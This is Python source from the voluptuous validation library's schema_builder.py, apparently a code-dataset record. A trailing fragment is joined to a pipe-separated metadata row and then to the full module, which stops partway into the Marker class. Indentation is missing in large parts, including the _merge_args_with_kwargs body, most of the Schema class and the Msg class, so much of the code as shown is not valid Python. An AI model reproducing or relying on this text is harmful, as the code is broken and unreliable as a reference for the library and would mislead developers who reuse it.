    def __init__(self, schema, group_of_exclusion, msg=None, description=None):
        super(Exclusive, self).__init__(schema, msg=msg,
                                        description=description)
        # Keys sharing a group name are mutually exclusive: the dict
        # compiler rejects input containing two or more members of the
        # same group before per-key validation runs.
        self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
    """ Mark a node in the schema as inclusive.
    Inclusive keys inherited from Optional:
    >>> schema = Schema({
    ...     Inclusive('filename', 'file'): str,
    ...     Inclusive('mimetype', 'file'): str
    ... })
    >>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
    >>> data == schema(data)
    True
    Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
    >>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
    ...     schema({'filename': 'dog.jpg'})
    If none of the keys in the group are present, it is accepted:
    >>> schema({})
    {}
    For example, API can return 'height' and 'width' together, but not separately.
    >>> msg = "Height and width must exist together"
    >>> schema = Schema({
    ...     Inclusive('height', 'size', msg=msg): int,
    ...     Inclusive('width', 'size', msg=msg): int
    ... })
    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'height': 100})
    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'width': 100})
    >>> data = {'height': 100, 'width': 100}
    >>> data == schema(data)
    True
    """
    def __init__(self, schema, group_of_inclusion,
                 msg=None, description=None, default=UNDEFINED):
        super(Inclusive, self).__init__(schema, msg=msg,
                                        default=default,
                                        description=description)
        # Keys sharing a group name must appear all together or not at all;
        # the dict compiler enforces this before per-key validation runs.
        self.group_of_inclusion = group_of_inclusion
class Required(Marker):
    """Mark a node in the schema as being required, and optionally provide a default value.
    >>> schema = Schema({Required('key'): str})
    >>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
    ...     schema({})
    >>> schema = Schema({Required('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Required('key', default=list): list})
    >>> schema({})
    {'key': []}
    """
    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Required, self).__init__(schema, msg=msg,
                                       description=description)
        # As with Optional, normalise the default into a factory; the dict
        # compiler inserts the default for a missing key before validation,
        # so a Required key with a default never fails as "not provided".
        self.default = default_factory(default)
class Remove(Marker):
    """Mark a node in the schema to be removed and excluded from the validated
    output. Keys that fail validation will not raise ``Invalid``. Instead, these
    keys will be treated as extras.
    >>> schema = Schema({str: int, Remove(int): str})
    >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
    ...     schema({'keep': 1, 1: 1.0})
    >>> schema({1: 'red', 'red': 1, 2: 'green'})
    {'red': 1}
    >>> schema = Schema([int, Remove(float), Extra])
    >>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
    [1, 2, 3, 5, '7']
    """
    def __call__(self, v):
        super(Remove, self).__call__(v)
        # Return the class itself as a sentinel: the mapping and sequence
        # compilers compare results against `Remove` by identity and drop
        # the matching entries from the output.
        return self.__class__
    def __repr__(self):
        return "Remove(%r)" % (self.schema,)
    def __hash__(self):
        # Identity hash (not the wrapped schema's, as Marker uses) so several
        # Remove markers can coexist as distinct keys in one schema dict.
        return object.__hash__(self)
def message(default=None, cls=None):
    """Convenience decorator to allow functions to provide a message.
    Set a default message:
    >>> @message('not an integer')
    ... def isint(v):
    ...     return int(v)
    >>> validate = Schema(isint())
    >>> with raises(er.MultipleInvalid, 'not an integer'):
    ...     validate('a')
    The message can be overridden on a per validator basis:
    >>> validate = Schema(isint('bad'))
    >>> with raises(er.MultipleInvalid, 'bad'):
    ...     validate('a')
    The class thrown too:
    >>> class IntegerInvalid(er.Invalid): pass
    >>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
    >>> try:
    ...     validate('a')
    ... except er.MultipleInvalid as e:
    ...     assert isinstance(e.errors[0], IntegerInvalid)
    """
    if cls and not issubclass(cls, er.Invalid):
        raise er.SchemaError("message can only use subclases of Invalid as custom class")

    # Three nested layers: `decorator` binds the target function, `check`
    # binds per-validator overrides, and `wrapper` runs at validation time.
    def decorator(f):
        @wraps(f)
        def check(msg=None, clsoverride=None):
            @wraps(f)
            def wrapper(*args, **kwargs):
                # Trap ValueError from the wrapped validator and re-raise it
                # as the most specific available class with the most specific
                # available message (per-call override > decorator > generic).
                try:
                    return f(*args, **kwargs)
                except ValueError:
                    raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
            return wrapper
        return check
    return decorator
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
    """Decorator for validating arguments of a function against a given schema.
    Set restrictions for arguments:
    >>> @validate(arg1=int, arg2=int)
    ... def foo(arg1, arg2):
    ...     return arg1 * arg2
    Set restriction for returned value:
    >>> @validate(arg=int, __return__=int)
    ... def bar(arg1):
    ...     return arg1 * 2
    """
    RETURNS_KEY = '__return__'

    def validate_schema_decorator(func):
        returns_defined = False
        returns = None
        # Combine positional and keyword schema arguments into one mapping
        # (presumably keyed by the decorated function's parameter names via
        # _args_to_dict, which is defined elsewhere in this module -- verify).
        schema_args_dict = _args_to_dict(func, a)
        schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
        # '__return__' is reserved for the return-value schema; pull it out
        # so it is not treated as a parameter restriction.
        if RETURNS_KEY in schema_arguments:
            returns_defined = True
            returns = schema_arguments[RETURNS_KEY]
            del schema_arguments[RETURNS_KEY]
        # ALLOW_EXTRA lets un-annotated parameters through unvalidated; with
        # no restrictions at all, fall back to identity pass-throughs.
        input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
                        if len(schema_arguments) != 0 else lambda x: x)
        output_schema = Schema(returns) if returns_defined else lambda x: x

        @wraps(func)
        def func_wrapper(*args, **kwargs):
            # Validate all arguments first, then call, then validate output.
            args_dict = _args_to_dict(func, args)
            arguments = _merge_args_with_kwargs(args_dict, kwargs)
            validated_arguments = input_schema(arguments)
            output = func(**validated_arguments)
            return output_schema(output)
        return func_wrapper
    return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | _merge_args_with_kwargs | python | def _merge_args_with_kwargs(args_dict, kwargs_dict):
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret | Merge args with kwargs. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L1249-L1253 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
# Python 2/3 compatibility shims: on Py3, alias the Py2-only builtin names
# used throughout this module and provide a uniform dict-items iterator.
if sys.version_info >= (3,):
    long = int
    unicode = str
    basestring = str
    ifilter = filter
    def iteritems(d):
        return d.items()
else:
    from itertools import ifilter
    def iteritems(d):
        return d.iteritems()
# The Mapping ABC moved to collections.abc in Python 3.3.
if sys.version_info >= (3, 3):
    _Mapping = collections.abc.Mapping
else:
    _Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
    """Falsy sentinel type for "no value given"; prints as ``...``.

    Note: code in this module compares against the UNDEFINED singleton with
    ``is``, so truthiness is a convenience, not a correctness requirement.
    """

    def __nonzero__(self):  # Python 2 truthiness hook
        return False

    # Fix: Python 3 ignores __nonzero__ (it uses __bool__), which made the
    # sentinel truthy there despite the clear intent above. Alias it so the
    # sentinel is falsy on both major versions.
    __bool__ = __nonzero__

    def __repr__(self):
        return '...'
UNDEFINED = Undefined()
def Self():
    """Recursive-schema placeholder; compiled by identity, never invoked.

    Schema._compile special-cases ``Self`` (``schema is Self``) and routes
    validation back to the enclosing compiled schema, so this body is
    unreachable during normal validation.
    """
    raise er.SchemaError('"Self" should never be called')
def default_factory(value):
    """Coerce a default into a factory.

    UNDEFINED and callables are returned untouched; any other value is
    wrapped in a zero-argument lambda that produces it.
    """
    if callable(value) or value is UNDEFINED:
        return value
    return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
    """Doctest helper: assert that *exc* is raised within the block.

    Optionally also checks the exception text for exact equality (*msg*)
    or a regex match (*regex*).  NOTE(review): if no exception is raised,
    the block exits silently -- callers must not rely on it failing then.
    """
    try:
        yield
    except exc as e:
        if msg is not None:
            assert str(e) == msg, '%r != %r' % (str(e), msg)
        if regex is not None:
            assert re.search(regex, str(e)), '%r does not match %r' % (str(e), regex)
def Extra(_):
    """Allow keys in the data that are not present in the schema.

    Used as a sentinel: Schema._compile special-cases it by identity
    (``schema is Extra``), so this body never runs during validation.
    """
    raise er.SchemaError('"Extra" should never be called')


# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
    """A scalar value.
    The schema can either be a value or a type.
    >>> _compile_scalar(int)([], 1)
    1
    >>> with raises(er.Invalid, 'expected float'):
    ...     _compile_scalar(float)([], '1')
    Callables have
    >>> _compile_scalar(lambda v: float(v))([], '1')
    1.0
    As a convenience, ValueError's are trapped:
    >>> with raises(er.Invalid, 'not a valid value'):
    ...     _compile_scalar(lambda v: float(v))([], 'a')
    """
    # A class acts as an isinstance() check (no coercion is performed).
    if inspect.isclass(schema):
        def validate_instance(path, data):
            if isinstance(data, schema):
                return data
            else:
                msg = 'expected %s' % schema.__name__
                raise er.TypeInvalid(msg, path)
        return validate_instance
    # A callable validates/coerces: ValueError is translated into
    # ValueInvalid, while a nested Invalid gets the current path prepended
    # and is re-raised unchanged.
    if callable(schema):
        def validate_callable(path, data):
            try:
                return schema(data)
            except ValueError as e:
                raise er.ValueInvalid('not a valid value', path)
            except er.Invalid as e:
                e.prepend(path)
                raise
        return validate_callable
    # Any other schema value is compared against the data for equality.
    def validate_value(path, data):
        if data != schema:
            raise er.ScalarInvalid('not a valid value', path)
        return data
    return validate_value
def _compile_itemsort():
    '''return sort function of mappings'''
    def is_extra(key_):
        return key_ is Extra
    def is_remove(key_):
        return isinstance(key_, Remove)
    def is_marker(key_):
        return isinstance(key_, Marker)
    def is_type(key_):
        return inspect.isclass(key_)
    def is_callable(key_):
        return callable(key_)
    # priority list for map sorting (in order of checking)
    # We want Extra to match last, because it's a catch-all. On the other hand,
    # Remove markers should match first (since invalid values will not
    # raise an Error, instead the validator will check if other schemas match
    # the same value).
    # NOTE: the first element of each pair is the *rank* returned to sorted(),
    # while the list order decides which predicate is tested first -- e.g.
    # is_type is tested before is_callable because classes are callable too,
    # yet types must still sort after plain callables (rank 4 vs 3).
    priority = [(1, is_remove),  # Remove highest priority after values
                (2, is_marker),  # then other Markers
                (4, is_type),  # types/classes lowest before Extra
                (3, is_callable),  # callables after markers
                (5, is_extra)]  # Extra lowest priority
    def item_priority(item_):
        # item_ is a (key, value) pair from the schema mapping; only the key
        # determines match priority.
        key_ = item_[0]
        for i, check_ in priority:
            if check_(key_):
                return i
        # values have hightest priorities
        return 0
    return item_priority


# Module-level singleton used as the sort key for mapping candidates.
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
    """Iterate over schema in a meaningful order."""
    # Without this, Extra might appear first in the iterator, and fail to
    # validate a key even though it's a Required that has its own validation,
    # generating a false positive.
    # Order: literal values first, then Remove, Markers, callables, types,
    # and Extra last (see _compile_itemsort for the ranking).
    return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
    """Return iterator over object attributes. Respect objects with
    defined __slots__.

    Yields (name, value) pairs from the instance __dict__ (or _asdict()
    for namedtuples), followed by any slot-backed attributes.
    """
    d = {}
    try:
        d = vars(obj)
    except TypeError:
        # vars() raises TypeError for objects without __dict__;
        # maybe we have named tuple here?
        if hasattr(obj, '_asdict'):
            d = obj._asdict()
    for item in iteritems(d):
        yield item
    # Slot-backed attributes never appear in __dict__, so yield them too.
    try:
        slots = obj.__slots__
    except AttributeError:
        pass
    else:
        for key in slots:
            if key != '__dict__':
                yield (key, getattr(obj, key))
class Msg(object):
"""Report a user-friendly message if a schema fails to validate.
>>> validate = Schema(
... Msg(['one', 'two', int],
... 'should be one of "one", "two" or an integer'))
>>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
... validate(['three'])
Messages are only applied to invalid direct descendants of the schema:
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
>>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
... validate([['three']])
The type which is thrown can be overridden but needs to be a subclass of Invalid
>>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
... validate = Schema(Msg([int], 'should be int', cls=KeyError))
If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
>>> try:
... validate(['three'])
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], er.RangeInvalid)
"""
def __init__(self, schema, msg, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("Msg can only use subclases of"
" Invalid as custom class")
self._schema = schema
self.schema = Schema(schema)
self.msg = msg
self.cls = cls
def __call__(self, v):
try:
return self.schema(v)
except er.Invalid as e:
if len(e.path) > 1:
raise e
else:
raise (self.cls or er.Invalid)(self.msg)
def __repr__(self):
return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
    """Indicate that we should work with attributes, not keys."""
    def __init__(self, schema, cls=UNDEFINED):
        # Populate the dict part first, then remember the class the
        # validated instances must belong to (UNDEFINED disables the check).
        super(Object, self).__init__(schema)
        self.cls = cls
class VirtualPathComponent(str):
    """A synthetic error-path element (e.g. an exclusion/inclusion group
    label) that renders as ``<label>`` instead of a plain string."""
    def __str__(self):
        # str concatenation via join: using %-formatting here would call
        # __str__ again and recurse.
        return ''.join(('<', self, '>'))
    def __repr__(self):
        # repr matches str so error paths read cleanly.
        return str(self)
# Markers.py
class Marker(object):
    """Mark nodes for special treatment.

    A marker wraps a schema node, compiles it eagerly, and validates
    values against it when called.  A shallow failure may be replaced by
    a custom message; deeper failures propagate untouched.
    """
    def __init__(self, schema_, msg=None, description=None):
        self.schema = schema_
        self._schema = Schema(schema_)
        self.msg = msg
        self.description = description
    def __call__(self, v):
        try:
            return self._schema(v)
        except er.Invalid as e:
            shallow = len(e.path) <= 1
            if self.msg and shallow:
                # Only direct failures get the custom message.
                raise er.Invalid(self.msg)
            raise
    def __str__(self):
        return str(self.schema)
    def __repr__(self):
        return repr(self.schema)
    def __lt__(self, other):
